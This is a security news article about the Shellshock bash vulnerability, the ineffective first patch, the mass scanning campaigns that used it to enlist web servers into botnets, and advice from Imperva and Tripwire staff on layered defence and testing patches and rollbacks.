Shellshock was successful because of a failure on the first patch and the rush to install it.
According to a blog by Imperva, hackers rapidly adapted the vulnerability into their exploit kits and their ongoing attack campaigns and while the original patch was proven ineffective, a second wave of exploits dovetailed into the first one.
Barry Shteiman, director security strategy at Imperva, said: “This vulnerability is one of the best examples of the risk to modern software systems that stems from third party components. This is an inherent risk of modern systems, and once again we are reminded that patching is an ineffective approach to managing it.”
He said that patching failed in this instance because the first fix did not solve the problem and a second vulnerability (CVE-2014-7169) was then defined and eventually fixed (CVE-2014-7169); however, many system administrators had already put the first patch in during maintenance windows, which meant that re-fixing it caused even more of a headache at that point.
Research by Imperva found that soon after the Shellshock vulnerability was published, web servers were being attacked with different flavours of this vulnerability. “In a week period following public exposure of the vulnerability, we were able to record as many as 36,000 attack campaigns using the exploit,” he said.
In Imperva’s analysis, it detected at least four major mass scan tools that targeted the Shellshock vulnerability and malicious payloads were usually used in order to download a bot client script via the ‘wget’ command. The downloaded file was used to infect the web server and unknowingly add it to a botnet.
He recommended mitigation via different mechanisms, such as: detection of OS command injection or detection of access to susceptible URLs, detection of “bad players”, automated attacks and deviation in headers values– as the attacks deviate from the normal values to common headers.
Ken Westin, senior security analyst at Tripwire, said that Shellshock and other high impact vulnerabilities have further illustrated the need for a security strategy that is layered through implementation of multiple security controls.
He said: “If an organisation’s only security strategy is patching systems, they have already lost the battle: it is like bailing water on the Titanic given today’s threat landscape. Prevention is one side of the equation and can no longer be implemented manually, but requires implementation of a complete vulnerability management program leveraging automation and security intelligence.
“Organisations also need to detect security events and changes in their environment, as well as the ability to retroactively and quickly identify indicators of compromise to know if a vulnerable system was actually exploited and rapidly identify the scope of the compromise.”
Dwayne Melancon, CTO of Tripwire, said that failed patches are a risk, regardless of the issue. “There are a number of steps enterprises can take,” he said. “First, rehearse the patch in a pre-production environment to ensure that it doesn’t cause system instability, then deploy it into the production environment once you are confident it is stable. This process is recommended even in the event of an ’emergency’ patch – you might abbreviate the testing you do, but deploying untested code into a production environment is very risky.
“Things can get more complex if a vendor releases an unsuccessful patch, but I recommend testing rollbacks or patch uninstalls, as well. That way, if you find that a patch is incorrect or incomplete you have mor
e options. In many cases, vendors provide guidance about whether newer or updated patches should be applied over the top of the previous patch or not, and most modern installation processes can intelligently handle patch version resolution. However, in the case that a patch can be installed over the top of the previous iteration, you’ll be glad you tested the rollback process ahead of time.”